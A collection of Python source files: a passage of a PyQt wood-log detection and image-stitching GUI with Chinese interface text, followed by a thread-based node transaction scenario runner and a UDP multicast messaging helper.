# self.item.setScale(self.zoomscale)
self.scene = QGraphicsScene() # 创建场景
self.scene.addItem(self.item)
self.graphicsView.setScene(self.scene)
#cv2.waitKey(1)
if not config.DEBUG:
self.model = init_detector(self.config_file, self.checkpoint_file_list[0])
result = inference_detector(self.model, frame)
result_img, inds, cal_results=new_show_result_21(frame, result, self.class_names, score_thr=config.SCORE_THR)
else:
result = []
result_img = frame.copy()
inds = [0,0]
pixels_output = [0,0]
###将检测结果显示到图窗上以及保存
result_img = cv2.cvtColor(np.array(result_img,dtype=np.uint8),cv2.COLOR_RGB2BGR)
img_o = cv2.resize(result_img, (520, 520))
img_o = cv2.cvtColor(img_o, cv2.COLOR_BGR2RGB)
out.write(img_o)
img_o = QImage(img_o, img_o.shape[1], img_o.shape[0], QImage.Format_RGB888)
pix = QPixmap.fromImage(img_o)
self.item = QGraphicsPixmapItem(pix) # 创建像素图元
# self.item.setScale(self.zoomscale)
self.scene = QGraphicsScene() # 创建场景
self.scene.addItem(self.item)
self.graphicsView_2.setScene(self.scene)
QApplication.processEvents()
self.textEdit.setText("当前帧检测木头个数:"+ str(len(inds)) + '\n')
self.textEdit.append('当前帧每根木头的像素的个数:\n')
[self.textEdit.append('长轴:' + str(cal_result[0] / 10) + 'cm' + ',' + '短轴:' + str(cal_result[1] / 10) + 'cm' + '\n') for cal_result in cal_results]
#cv2.waitKey(1)
#print('hah')
# while(self.pause_det):
#
# # self.textEdit.setText("检测已经暂停,可继续检测" + '\n')
# # # 检测时间为总时长除以视频帧数
# # self.time = time.time() - start
# # self.textEdit.setText("单帧检测运行时间:" + str(self.time) / frame_num + 's' + '\n')
# print('wait')
#暂停等待
if video_length == frame_num:
self.stopEvent.clear()
self.graphicsView_2.setScene(None)
self.graphicsView.setScene(None)
self.textEdit.setText("当前视频已经处理完毕,请重新添加视频文件" + '\n')
break
else:
break
# 检测时间为总时长除以视频帧数
self.pushButton_2.setText("检测")
self.time = time.time() - start
self.textEdit.setText("单帧检测运行时间:" + str(self.time/ frame_num) + 's' + '\n')
self.cap.release()
out.release()
    # Open a file dialog to choose the test image; the path must not contain Chinese characters
def multi_image(self):
if not config.DEBUG:
from woodev.apis import init_detector, inference_detector
self.graphicsView_3.setScene(None)
QApplication.processEvents()
img_paths = self.img_list
img_paths_raw = self.img_list_raw
out_folder = './results/'
sticher_folder = './input-42-data/'
if os.path.exists(sticher_folder):
shutil.rmtree(sticher_folder)
if not os.path.exists(sticher_folder):
os.makedirs(sticher_folder)
if os.path.exists(out_folder):
shutil.rmtree(out_folder)
if not os.path.exists(out_folder):
os.makedirs(out_folder)
#shutil.copy('sticher/image-stitching', 'results/image-stitching')
#shutil.copy('sticher/config.cfg', './config.cfg')
if len(img_paths_raw) < len(img_paths):
self.textEdit.setText('深度数据有缺失,请保证每张原图有对应的深度数据,为.tif文件!,如果文件缺失,将默认距离为2m' + '\n')
QApplication.processEvents()
img_paths_raw = []
for i in range(len(img_paths)):
img_paths_raw.append('none')
img_count = 0
mask_index = 0
sticher_flag = self.lineEdit.text()
for img_path, img_path_raw in zip(img_paths, img_paths_raw):
out_file = out_folder + img_path.split('/')[-1]
img = cv2.imread(img_path)
if not config.DEBUG:
self.model = init_detector(self.config_file, self.checkpoint_file_list[0])
result = inference_detector(self.model, img)
else:
result = []
####得到检测结果
# if(img_count%2==0):
# mask_index=0
# else:
# mask_index=1
if sticher_flag is "":
self.textEdit.setText('拼接标志为为空,请输入正确的值!')
QApplication.processEvents()
else:
if int(sticher_flag) <= 0 or str(int(sticher_flag)) != sticher_flag:
self.textEdit.setText('拼接顺序值有误,必须为大于0的整数,请重新输入!')
QApplication.processEvents()
else:
if int(sticher_flag)== 1:
mask_index = img_count % 3
img_count += 1
elif int(sticher_flag) == 2:
#one_row_num = len(img_paths) // 2
mask_index = img_count % 6
mask_index = mask_index // 2
img_count += 1
if not config.DEBUG:
_ = new_show_result_3(img, result, self.class_names, img_path_raw,
score_thr=0.3, out_file=out_file, mask_index=mask_index)
###将检测结果显示到图窗上
else:
result_img = np.zeros((520, 520, 3), dtype=np.uint8)
inds = [0, 0]
pixels_output = [0, 0]
#print(img_paths)
# print('sticher_flag:', sticher_flag)
# print(sticher_flag is None)
# print(int(sticher_flag) <= 0)
# print(int(sticher_flag) != sticher_flag)
if sticher_flag is "":
self.textEdit.setText('拼接标志为为空,请输入正确的值!')
QApplication.processEvents()
else:
if int(sticher_flag) <= 0 or str(int(sticher_flag)) != sticher_flag:
self.textEdit.setText('拼接顺序值有误,必须为大于0的整数,请重新输入!')
QApplication.processEvents()
else:
if int(sticher_flag) == 1:
commad = "./sticher/NISwGSP"
file_name = img_paths[0].split('/')[-3] + '-' + img_paths[0].split('/')[-2]
sub_siticher_folders = sticher_folder + file_name
sub_siticher_folders_mask = sub_siticher_folders + '-mask'
if not os.path.exists(sub_siticher_folders):
os.makedirs(sub_siticher_folders)
if not os.path.exists(sub_siticher_folders_mask):
os.makedirs(sub_siticher_folders_mask)
print(img_paths)
for img_path in img_paths:
filename = img_path.split('/')[-1]
shutil.copy(out_folder + filename, sub_siticher_folders + '/' + filename)
filename_mask = filename.split('.')[0] + '_mask.png'
print(filename_mask)
shutil.copy(out_folder + filename_mask, sub_siticher_folders_mask + '/' + filename_mask)
#print(commad)
file_name_txt = file_name +'-STITCH-GRAPH'
creat_match_graph_txt(img_count, root_path=sub_siticher_folders, root_path_mask=sub_siticher_folders_mask, file_name=file_name_txt)
commad += ' ' + file_name
cmd = os.system(commad)
if cmd != 0:
self.textEdit.setText('图片数据有误!' + '\n')
QApplication.processEvents()
                    ########################################### stitching module
                    # Save the txt file describing the match graph for stitching,
                    # call the external stitching program,
                    # and move the stitched image and mask into the results folder.
                    #
shutil.move(sticher_folder + '0_results/' + file_name + '-result' + '/' + file_name + '-[NISwGSP][2D][BLEND_LINEAR].png', out_folder + 'out.png')
shutil.move(sticher_folder + '0_results/' + file_name + '-mask-result' + '/' + file_name + '-[NISwGSP][2D][BLEND_LINEAR].png', out_folder + 'out_mask.png')
#print('Done!')
                    ############################################# result-merging module; functions are defined in merger_result.py
                    # Build the list of saved result images, the list of detection csv files and the stitched image name
input_image_list = [out_folder + img_path.split('/')[-1] for img_path in img_paths]
input_csv_file_list = [ img_path[:-4]+'.csv' for img_path in input_image_list]
out_final_mask = out_folder + 'out_mask.png'
                    log_info = get_final_result(input_image_list, input_csv_file_list, out_final_mask)  # after this call finishes, merger_final.csv is saved as the final result
print('log_info:', log_info)
if log_info == '正常':
img, cal_list, count_num = get_result_from_meger_file('./meger_final.csv', out_folder +'out.png')
img1 = cv2.imread(out_folder + 'out.png')
img2 = img
img = cv2.resize(img2, (1100, 550))
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
frame = QImage(img, img.shape[1], img.shape[0], QImage.Format_RGB888)
pix = QPixmap.fromImage(frame)
self.item = QGraphicsPixmapItem(pix) # 创建像素图元
# self.item.setScale(self.zoomscale)
self.scene = QGraphicsScene() # 创建场景
self.scene.addItem(self.item)
self.graphicsView_3.setScene(self.scene)
# img1 = cv2.resize(img1, (520, 520))
# img2 = cv2.resize(img2, (520, 520))
# x = img1.shape[1] # 获取图像大小
# y = img1.shape[0]
# self.zoomscale = 1 # 图片放缩尺度
# frame1 = QImage(img1, x, y, QImage.Format_RGB888)
# pix1 = QPixmap.fromImage(frame1)
# self.item1 = QGraphicsPixmapItem(pix1) # 创建像素图元
# # self.item.setScale(self.zoomscale)
# self.scene1 = QGraphicsScene() # 创建场景
# self.scene1.addItem(self.item1)
#
# frame2 = QImage(img2, x, y, QImage.Format_RGB888)
# pix2 = QPixmap.fromImage(frame2)
# self.item2 = QGraphicsPixmapItem(pix2) # 创建像素图元
# # self.item.setScale(self.zoomscale)
# self.scene2 = QGraphicsScene() # 创建场景
# self.scene2.addItem(self.item2)
#
# self.graphicsView.setScene(self.scene1)
# self.graphicsView_2.setScene(self.scene2)
self.textEdit.setText("检测木头总的个数:" + str(count_num) + '\n')
self.textEdit.append('具体的结果保存在results文件夹,以及meger_final.csv中:\n')
[self.textEdit.append('第' + str(i) + '根木头:\n' + '长轴:' + str(cal_result[0] / 10) + 'cm' + ',' + '\n短轴:' + str(cal_result[1] / 10) + 'cm' + '\n') for i, cal_result in enumerate(cal_list)]
QApplication.processEvents()
                        # Read the wood count from the csv; its format is basically the same as the earlier detection csv,
                        # with four extra fields giving each log's bbox in the stitched image
else:
self.textEdit.setText(str(log_info) + '\n')
QApplication.processEvents()
elif int(sticher_flag) == 2:
file_name = img_paths[0].split('/')[-3] + '-' + img_paths[0].split('/')[-2]
img_paths_odd = img_paths[::2]
img_paths_even = img_paths[1::2]
img_paths_raw_odd = img_paths_raw[::2]
img_paths_raw_even = img_paths_raw[1::2]
commad = "./sticher/NISwGSP"
sub_siticher_folders = sticher_folder + file_name
sub_siticher_folders_mask = sub_siticher_folders + '-mask'
sub_siticher_folders1 = sticher_folder + file_name+'_1'
sub_siticher_folders_mask1 = sub_siticher_folders1 + '-mask'
if not os.path.exists(sub_siticher_folders):
os.makedirs(sub_siticher_folders)
if not os.path.exists(sub_siticher_folders1):
os.makedirs(sub_siticher_folders1)
if not os.path.exists(sub_siticher_folders_mask):
os.makedirs(sub_siticher_folders_mask)
if not os.path.exists(sub_siticher_folders_mask1):
os.makedirs(sub_siticher_folders_mask1)
count=0
for img_path in img_paths:
filename = img_path.split('/')[-1]
filename_mask = filename.split('.')[0] + '_mask.png'
filename_bmask = filename.split('.')[0] + '_bmask.png'
shutil.copy(out_folder + filename, sub_siticher_folders + '/' + filename)
shutil.copy(out_folder + filename, sub_siticher_folders1 + '/' + filename)
if count%2==0:
shutil.copy(out_folder + filename_mask, sub_siticher_folders_mask + '/' + filename_mask)
shutil.copy(out_folder + filename_bmask, sub_siticher_folders_mask1 + '/' + filename_mask)
else:
shutil.copy(out_folder + filename_mask, sub_siticher_folders_mask1 + '/' + filename_mask)
shutil.copy(out_folder + filename_bmask, sub_siticher_folders_mask + '/' + filename_mask)
count+=1
file_name_txt = file_name + '-STITCH-GRAPH'
creat_match_graph_txt(img_count, root_path=sub_siticher_folders,
root_path_mask=sub_siticher_folders_mask, file_name=file_name_txt)
file_name_1 = file_name + '_1'
file_name_txt = file_name + '_1' + '-STITCH-GRAPH'
creat_match_graph_txt(img_count, root_path=sub_siticher_folders1,
root_path_mask=sub_siticher_folders_mask1, file_name=file_name_txt)
commad_1 = commad + ' ' + file_name
cmd = os.system(commad_1)
if cmd != 0:
self.textEdit.setText('图片数据有误!' + '\n')
QApplication.processEvents()
commad_1 = commad + ' ' + file_name+'_1'
cmd = os.system(commad_1)
if cmd != 0:
self.textEdit.setText('图片数据有误!' + '\n')
QApplication.processEvents()
shutil.copy(
sticher_folder + '0_results/' + file_name + '-result' + '/' + file_name + '-[NISwGSP][2D][BLEND_LINEAR].png',
out_folder + 'out1.png')
shutil.copy(
sticher_folder + '0_results/' + file_name + '-mask-result' + '/' + file_name + '-[NISwGSP][2D][BLEND_LINEAR].png',
out_folder + 'out_mask1.png')
shutil.copy(
sticher_folder + '0_results/' + file_name_1 + '-result' + '/' + file_name_1 + '-[NISwGSP][2D][BLEND_LINEAR].png',
out_folder + 'out2.png')
shutil.copy(
sticher_folder + '0_results/' + file_name_1 + '-mask-result' + '/' + file_name_1 + '-[NISwGSP][2D][BLEND_LINEAR].png',
out_folder + 'out_mask2.png')
# input_image_list = ['./tmp_merger_final1.png', './tmp_merger_final2.png']
# input_csv_file_list = ['./tmp_merger_final1.csv', './tmp_merger_final2.csv']
# out_final_mask = out_folder + 'out_mask.png'
out_final_mask = [out_folder + 'out_mask1.png',
out_folder + 'out_mask2.png']
                    input_csv_file_list = [out_folder + img_path.split('/')[-1][:-4] + '.csv' for img_path in img_paths]
input_img_mask_list = [out_folder + img_path.split('/')[-1] for img_path in img_paths]
log_info = get_final_result_multirows(input_img_mask_list, input_csv_file_list, out_final_mask)
if log_info == '正常':
img, cal_list, count_num = get_result_from_meger_file('./' +'meger_final.csv', out_folder + 'out2.png')
img1 = cv2.imread(out_folder + 'out2.png')
img2 = img
x = img1.shape[1] # 获取图像大小
y = img1.shape[0]
img = cv2.resize(img2, (1100, 550))
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
frame = QImage(img, img.shape[1], img.shape[0], QImage.Format_RGB888)
pix = QPixmap.fromImage(frame)
self.item = QGraphicsPixmapItem(pix) # 创建像素图元
# self.item.setScale(self.zoomscale)
self.scene = QGraphicsScene() # 创建场景
self.scene.addItem(self.item)
self.graphicsView_3.setScene(self.scene)
# self.zoomscale = 1 # 图片放缩尺度
# frame1 = QImage(img1, x, y, QImage.Format_RGB888)
# pix1 = QPixmap.fromImage(frame1)
# self.item1 = QGraphicsPixmapItem(pix1) # 创建像素图元
# # self.item.setScale(self.zoomscale)
# self.scene1 = QGraphicsScene() # 创建场景
# self.scene1.addItem(self.item1)
#
# frame2 = QImage(img2, x, y, QImage.Format_RGB888)
# pix2 = QPixmap.fromImage(frame2)
# self.item2 = QGraphicsPixmapItem(pix2) # 创建像素图元
# # self.item.setScale(self.zoomscale)
# self.scene2 = QGraphicsScene() # 创建场景
# self.scene2.addItem(self.item2)
#
# self.graphicsView.setScene(self.scene1)
# self.graphicsView_2.setScene(self.scene2)
self.textEdit.setText("检测木头总的个数:" + str(count_num) + '\n')
self.textEdit.append('具体的结果保存在results文件夹,以及meger_final.csv中:\n')
[self.textEdit.append(
'第' + str(i) + '根木头:\n' + '长轴:' + str(cal_result[0] / 10) + 'cm' + ',' + '\n短轴:' + str(cal_result[1] / 10) + 'cm' + '\n') for
i, cal_result in enumerate(cal_list)]
QApplication.processEvents()
else:
self.textEdit.setText(str(log_info) + '\n')
QApplication.processEvents()
####################################################################old version
# sub_siticher_folders = sticher_folder + file_name
# sub_siticher_folders_mask = sub_siticher_folders + '-mask'
# if not os.path.exists(sub_siticher_folders):
# os.makedirs(sub_siticher_folders)
# if not os.path.exists(sub_siticher_folders_mask):
# os.makedirs(sub_siticher_folders_mask)
# # print("img_paths:", img_paths)
# # print('odd:', img_paths_odd)
# # print("even:", img_paths_even)
# for img_path_odd in img_paths_odd:
# filename = img_path_odd.split('/')[-1]
# shutil.copy(out_folder + filename, sub_siticher_folders + '/' + filename)
# filename_mask = filename.split('.')[0] + '_mask.png'
# # print(filename_mask)
# shutil.copy(out_folder + filename_mask, sub_siticher_folders_mask + '/' + filename_mask)
# # print(commad)
# file_name_txt = file_name + '-STITCH-GRAPH'
# creat_match_graph_txt(img_count // 2, root_path=sub_siticher_folders,
# root_path_mask=sub_siticher_folders_mask, file_name=file_name_txt)
# commad_1 = commad + ' ' + file_name
# cmd = os.system(commad_1)
# if cmd != 0:
# self.textEdit.setText('图片数据有误!' + '\n')
# QApplication.processEvents()
#
# # second image ###
# file_name_2 = file_name +'_2'
# sub_siticher_folders_2 = sticher_folder + file_name_2
# sub_siticher_folders_mask_2 = sub_siticher_folders_2 + '-mask'
# if not os.path.exists(sub_siticher_folders_2):
# os.makedirs(sub_siticher_folders_2)
# if not os.path.exists(sub_siticher_folders_mask_2):
# os.makedirs(sub_siticher_folders_mask_2)
# print(img_paths)
# for img_path_even in img_paths_even:
# filename = img_path_even.split('/')[-1]
# shutil.copy(out_folder + filename, sub_siticher_folders_2 + '/' + filename)
# filename_mask = filename.split('.')[0] + '_mask.png'
# # print(filename_mask)
# shutil.copy(out_folder + filename_mask, sub_siticher_folders_mask_2 + '/' + filename_mask)
# # print(commad)
# file_name_txt = file_name_2 + '-STITCH-GRAPH'
# creat_match_graph_txt(img_count // 2, root_path=sub_siticher_folders_2,
# root_path_mask=sub_siticher_folders_mask_2, file_name=file_name_txt)
#
# commad_2 = commad + ' ' + file_name_2
# cmd = os.system(commad_2)
# if cmd != 0:
# self.textEdit.setText('图片数据有误!' + '\n')
# QApplication.processEvents()
#
# file_name_3 = file_name + '_3'
# sub_siticher_folders_3 = sticher_folder + file_name_3
# sub_siticher_folders_mask_3 = sub_siticher_folders_3 + '-mask'
# if not os.path.exists(sub_siticher_folders_3):
# os.makedirs(sub_siticher_folders_3)
# if not os.path.exists(sub_siticher_folders_mask_3):
# os.makedirs(sub_siticher_folders_mask_3)
# shutil.move(
# sticher_folder + '0_results/' + file_name + '-result' + '/' + file_name + '-[NISwGSP][2D][BLEND_LINEAR].png',
# sub_siticher_folders_3 + '/' + 'out1.png')
#
# shutil.move(
# sticher_folder + '0_results/' + file_name_2 + '-result' + '/' + file_name_2 + '-[NISwGSP][2D][BLEND_LINEAR].png',
# sub_siticher_folders_3 + '/' + 'out2.png')
#
# out_final_mask = [sticher_folder + '0_results/' + file_name + '-mask-result' + '/' + file_name + '-[NISwGSP][2D][BLEND_LINEAR].png',
# sticher_folder + '0_results/' + file_name_2 + '-mask-result' + '/' + file_name_2 + '-[NISwGSP][2D][BLEND_LINEAR].png']
# input_csv_file_list = [out_folder + img_path.split('/')[-1].rstrip('.png') + '.csv' for img_path in img_paths]
# input_img_mask_list = [out_folder + img_path.split('/')[-1] for img_path in img_paths]
# get_final_result_multirows(input_img_mask_list, input_csv_file_list, out_final_mask)
# shutil.copy(os.getcwd() + '/' + 'tmp_merger_final1.png', sub_siticher_folders_mask_3 + '/' + 'out_mask1.png')
# shutil.copy(os.getcwd() + '/' + 'tmp_merger_final2.png', sub_siticher_folders_mask_3 + '/' + 'out_mask2.png')
# file_name_txt = file_name_3 + '-STITCH-GRAPH'
# creat_match_graph_txt(2, root_path=sub_siticher_folders_3,
# root_path_mask=sub_siticher_folders_mask_3, file_name=file_name_txt)
# commad_3 = commad + ' ' + file_name_3
# cmd = os.system(commad_3)
# if cmd != 0:
# self.textEdit.setText('图片数据有误!' + '\n')
# QApplication.processEvents()
# shutil.move(
# sticher_folder + '0_results/' + file_name_3 + '-result' + '/' + file_name_3 + '-[NISwGSP][2D][BLEND_LINEAR].png',
# out_folder + 'out.png')
# shutil.move(
# sticher_folder + '0_results/' + file_name_3 + '-mask-result' + '/' + file_name_3 + '-[NISwGSP][2D][BLEND_LINEAR].png',
# out_folder + 'out_mask.png')
# input_image_list = ['./tmp_merger_final1.png', './tmp_merger_final2.png']
# input_csv_file_list = ['./tmp_merger_final1.csv', './tmp_merger_final2.csv']
# out_final_mask = out_folder + 'out_mask.png'
# log_info = get_final_result(input_image_list, input_csv_file_list, out_final_mask, is_row_format=False)
# if log_info == '正常':
# img, cal_list, count_num = get_result_from_meger_file('./meger_final.csv', out_folder + 'out.png')
# img1 = cv2.imread(out_folder + 'out.png')
# img2 = img
# x = img1.shape[1] # 获取图像大小
# y = img1.shape[0]
# img = cv2.resize(img2, (1100, 550))
# frame = QImage(img, img.shape[1], img.shape[0], QImage.Format_RGB888)
# pix = QPixmap.fromImage(frame)
# self.item = QGraphicsPixmapItem(pix) # 创建像素图元
# # self.item.setScale(self.zoomscale)
# self.scene = QGraphicsScene() # 创建场景
# self.scene.addItem(self.item)
# self.graphicsView_3.setScene(self.scene)
# # self.zoomscale = 1 # 图片放缩尺度
# # frame1 = QImage(img1, x, y, QImage.Format_RGB888)
# # pix1 = QPixmap.fromImage(frame1)
# # self.item1 = QGraphicsPixmapItem(pix1) # 创建像素图元
# # # self.item.setScale(self.zoomscale)
# # self.scene1 = QGraphicsScene() # 创建场景
# # self.scene1.addItem(self.item1)
# #
# # frame2 = QImage(img2, x, y, QImage.Format_RGB888)
# # pix2 = QPixmap.fromImage(frame2)
# # self.item2 = QGraphicsPixmapItem(pix2) # 创建像素图元
# # # self.item.setScale(self.zoomscale)
# # self.scene2 = QGraphicsScene() # 创建场景
# # self.scene2.addItem(self.item2)
# #
# # self.graphicsView.setScene(self.scene1)
# # self.graphicsView_2.setScene(self.scene2)
# self.textEdit.setText("检测木头总的个数:" + str(count_num) + '\n')
# self.textEdit.append('具体的结果保存在results文件夹,以及meger_final.csv中:\n')
# [self.textEdit.append(
# '第' + str(i) + '根木头:\n' + '长轴:' + str(cal_result[0] / 10) + 'cm' + ',' + '\n短轴:' + str(cal_result[1] / 10) + 'cm' + '\n') for
# i, cal_result in enumerate(cal_list)]
# QApplication.processEvents()
# else:
# self.textEdit.setText(str(log_info) + '\n')
# QApplication.processEvents()
else:
self.textEdit.setText("拼接顺序仅支持一/二排,请重新输入!!")
QApplication.processEvents()
def open_file_and_show_img(self):
self.graphicsView_2.setScene(None)
if self.isimage == True:
self.textEdit.setText("开始检测图片,选择要检测的图片,选择前请勾选对应选项如(图片/视频), 且保证存在.tif的深度数据")
file = QFileDialog.getOpenFileName(self, "Open File", "./","Images (*.png *.xpm *.jpg)")
current_filename = file[0]
current_filename = str(current_filename)
self.filename = current_filename
img = cv2.imread(current_filename)
if img is None:
print('读取图片为空!!!')
self.graphicsView_2.setScene(None)
self.graphicsView.setScene(None)
self.textEdit.setText("输入图片为空,请重新输入" + '\n')
else:
self.org_img = img.copy() #得到原始图片
img = cv2.resize(img,(520,520))
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
x = img.shape[1] # 获取图像大小
y = img.shape[0]
self.zoomscale = 1 # 图片放缩尺度
frame = QImage(img, x, y, QImage.Format_RGB888)
pix = QPixmap.fromImage(frame)
self.item = QGraphicsPixmapItem(pix) # 创建像素图元
# self.item.setScale(self.zoomscale)
self.scene = QGraphicsScene() # 创建场景
self.scene.addItem(self.item)
self.graphicsView.setScene(self.scene)
elif self.isvideo == True:
self.textEdit.setText("开始检测视频,选择要检测的视频,选择前请勾选对应选项(图片/视频),仅支持mp4视频")
file = QFileDialog.getOpenFileName(self, "Open File", "./","*.mp4")
current_filename = file[0]
#保存文件路径
self.current_filename = str(current_filename)
self.cap = cv2.VideoCapture(self.current_filename )
self.frameRate = self.cap.get(cv2.CAP_PROP_FPS)
while(self.cap.isOpened()):
# 如果读取成功
success, frame = self.cap.read()
if(success):
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
img_i = frame.copy()
img_i = cv2.resize(img_i, (520, 520))
img_i = cv2.cvtColor(img_i, cv2.COLOR_BGR2RGB)
new_frame = QImage(img_i, img_i.shape[1],img_i.shape[0] , QImage.Format_RGB888)
pix = QPixmap.fromImage(new_frame)
self.item = QGraphicsPixmapItem(pix) # 创建像素图元
# self.item.setScale(self.zoomscale)
self.scene = QGraphicsScene() # 创建场景
self.scene.addItem(self.item)
self.graphicsView.setScene(self.scene)
cv2.waitKey(1)
break
else:
break
self.cap.release()
elif self.ismulti == True:
self.textEdit.setText("选择要检测的所有帧的文件夹,开始多帧融合并检测,请确保每帧是按顺序编号,选择前请勾选对应选项(图片/视频/多帧图像),保证tif深度数据存在同一个文件夹中")
file = QFileDialog.getExistingDirectory(self,
"选取文件夹",
"./") #起始路径
#print(file)
directory = file
            if directory == '':
self.textEdit.setText("选择文件夹有误,请重新选择" + '\n')
QApplication.processEvents()
else:
#print('directory:', directory)
filenames = os.listdir(directory)
filenames_new = []
filenames_raw = []
for filename in filenames:
if 'tif' in filename:
filenames_raw.append(filename)
continue
if 'depth' in filename:
continue
filenames_new.append(filename)
filenames_new = sorted(filenames_new, key = lambda x: int(x[:-4]))
print('filename:', filenames_new)
filenames_raw = sorted(filenames_raw, key = lambda x: int(x[:-10]))
#print('filenames:', filenames)
img_list = [directory + '/' + filename for filename in filenames_new]
img_list_raw = [directory + '/' + filename for filename in filenames_raw]
self.img_list = img_list
self.img_list_raw = img_list_raw
    # Display a given image in the specified graphics view
def show_img_in_graphics(self,img,graphicsView):
pass
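        # A minimal sketch of what this helper could do (illustrative only; the original code
        # leaves it unimplemented and repeats this logic inline wherever an image is shown):
        #
        #     img = cv2.cvtColor(cv2.resize(img, (520, 520)), cv2.COLOR_BGR2RGB)
        #     frame = QImage(img, img.shape[1], img.shape[0], QImage.Format_RGB888)
        #     item = QGraphicsPixmapItem(QPixmap.fromImage(frame))
        #     scene = QGraphicsScene()
        #     scene.addItem(item)
        #     graphicsView.setScene(scene)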
# if __name__=="__main__" and config.DEBUG:
# import sys
# print("hello world")
# # cap = cv2.VideoCapture('./1.mp4')
# # frameRate = cap.get(cv2.CAP_PROP_FPS)
# # while cap.isOpened():
# # success, frame = cap.read()
# # if(success):
# # print(frame.shape)
#
# app = QApplication(sys.argv)
# w = Detection_Ui()
#
# w.show()
# #if w.ismulti == True:
# sys.exit(app.exec_())
|
meta_scenario.py
|
"""I offer a function that is run in a Thread to orchestrate the nodes"""
import codecs
import threading
from threading import Thread
from binascii import b2a_hex
from os import urandom
from queue import Queue
from time import sleep
# pylint: disable=broad-except
# pylint: disable=global-statement
from .project_logger import set_up_logging
SLAVES_SYNC = Queue()
SETTINGS_SYNC = Queue()
LOG = set_up_logging(__name__)
def update_settings_blocking():
LOG.info('Waiting for new settings')
settings = SETTINGS_SYNC.get()
sleep(5) # wait in case there are multiple updates
while not SETTINGS_SYNC.empty():
settings = SETTINGS_SYNC.get()
return settings['nodes'], settings['repetitions']
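# Illustrative note (assumed message shape, inferred from the helpers above and from
# Scenario.__run_transactions below): items placed on SETTINGS_SYNC are expected to look like
#   {'nodes': [{'name': 'node-0',
#               'transactions': [{'delta': 1, 'size': 64, 'quantity': 2}]}],
#    'repetitions': 10}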
def update_settings_if_available(current_settings, current_reps):
    LOG.info('Checking for new settings')
while not SETTINGS_SYNC.empty():
settings = SETTINGS_SYNC.get()
current_settings, current_reps = settings['nodes'], settings['repetitions']
return current_settings, current_reps
def run_scenario():
"""I dispatch scenario thread according to the defined scenario and stop it if new settings
arrive from the controller"""
current_slaves = []
current_scenario = Scenario()
while True:
try:
LOG.info("Current slaves %s", current_slaves)
current_slaves = update_current_slaves(current_slaves)
configs, repetitions = update_settings_blocking()
LOG.info(configs)
while len(current_slaves) < len(configs):
LOG.warning('Config and slaves are unequal. slaves: %s, config %s',
current_slaves, configs)
current_slaves = update_current_slaves(current_slaves)
configs, repetitions = update_settings_if_available(configs, repetitions)
sleep(5)
current_scenario.stop()
sleep(5) # let everything settle
current_scenario = Scenario().start(current_slaves, configs, repetitions)
except Exception as exception:
LOG.error("---!!! Unexpected exception occurred %s", exception)
def update_current_slaves(current_slaves):
current_slaves = [slave for slave in current_slaves if slave.is_alive()]
LOG.debug(current_slaves)
if not SLAVES_SYNC.empty():
while not SLAVES_SYNC.empty():
current_slaves = SLAVES_SYNC.get()
return current_slaves
class Scenario:
"""
I encapsulate a scenario thread. I tell the slaves that are associated with me what to do.
"""
def __init__(self):
self.is_running = False
def __run_transactions(self, slave, config, repetitions):
LOG.info('Started transactions in Thread %s id: %d', config['name'], threading.get_ident())
transactions = config['transactions']
while repetitions > 0:
repetitions -= 1
for transaction in transactions:
sleep(transaction['delta'])
if not self.is_running:
LOG.info('terminating thread %s %d', config['name'], threading.get_ident())
return
size_bytes = transaction['size']
quantity = transaction['quantity']
for _ in range(quantity):
try:
filler_data = codecs.decode(b2a_hex(urandom(size_bytes)))
slave.transact(config['name'], filler_data)
LOG.info('Completed transaction in Thread %s %d with delta %d',
config['name'],
threading.get_ident(), transaction['delta'])
except Exception as error:
LOG.exception('In %s, error %s', config['name'], error)
LOG.info('Finished one repetition %d left in %s', repetitions, config['name'])
LOG.info('Finished repetitions in %s %d', config['name'], threading.get_ident())
def start(self, current_slaves, configs, repetitions):
self.is_running = True
for slave, config in zip(current_slaves, configs):
thread = Thread(target=self.__run_transactions, args=[slave, config, repetitions])
thread.start()
return self
def stop(self):
self.is_running = False
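# Minimal usage sketch (illustrative only; in this module run_scenario() normally drives
# Scenario, and the slave objects are assumed to expose transact(name, data) and is_alive()):
#
#     scenario = Scenario().start(current_slaves, configs, repetitions=10)
#     ...
#     scenario.stop()   # worker threads notice is_running == False and exit after their delta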
|
multicast.py
|
import socket
from socket import error as socket_error
import struct
import threading
import time
import app_ui as ui
global host_name, verbose_mode, multicast_group_ip, multicast_port, timeout_in_seconds, multicast_group, num_times, no_keys, msg_delay
global responses, background_threads
responses = {}
background_threads = []
def begin(host_name_, verbose_mode_=False, multicast_group_ip_=None, multicast_port_=None, timeout_in_seconds_=None, num_times_=None, msg_delay_=None):
global host_name, verbose_mode, multicast_group_ip, multicast_port, timeout_in_seconds, multicast_group, num_times, no_keys, msg_delay
host_name = host_name_
verbose_mode = verbose_mode_
multicast_group_ip = multicast_group_ip_ or '224.3.29.71'
multicast_port = multicast_port_ or 10000
timeout_in_seconds = timeout_in_seconds_ or 0.1
num_times = num_times_ or 15
no_keys = False
msg_delay = msg_delay_ or 0.001
multicast_group = (multicast_group_ip, multicast_port)
ui.begin(verbose_mode)
def conclude():
wait_for_active_threads()
def broadcast(message, regex=None):
message = create_key(message, regex)
send_background_message(message)
def received():
return responses
# ========================================
def create_key(message, regex=None):
key = []
key.append(host_name)
key.append(str(time.time()))
if regex:
key.append(regex)
keystr = "/".join(key)
return keystr + ";" + message
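# Illustrative example of the key format produced above (host name and
# timestamp are made up): create_key("ping", regex="node.*") returns
# something like "host-01/1600000000.0/node.*;ping".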
# ========================================
def cast_socket():
# Create the datagram socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Set a timeout so the socket does not block indefinitely when trying
# to receive data.
sock.settimeout(timeout_in_seconds)
# Set the time-to-live for messages to 1 so they do not go past the
# local network segment.
ttl = struct.pack('b', 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, ttl)
return sock
def send_socket_message(sock, message, times):
global responses
responses = {}
for n in range(0, times):
ui.report_verbose('sending "%s"' % message)
sent = sock.sendto(message, multicast_group)
while True:
try:
data, server = sock.recvfrom(256)
except socket.timeout:
break
ip = server[0].strip("'")
responses[ip] = data
ui.report_verbose('received "%s" from %s' % (data, ip))
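        # Between resends, back off exponentially: the sleep below doubles
        # the base msg_delay on each pass of the outer loop.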
if n < (times - 1):
time.sleep(msg_delay * (2 ** n))
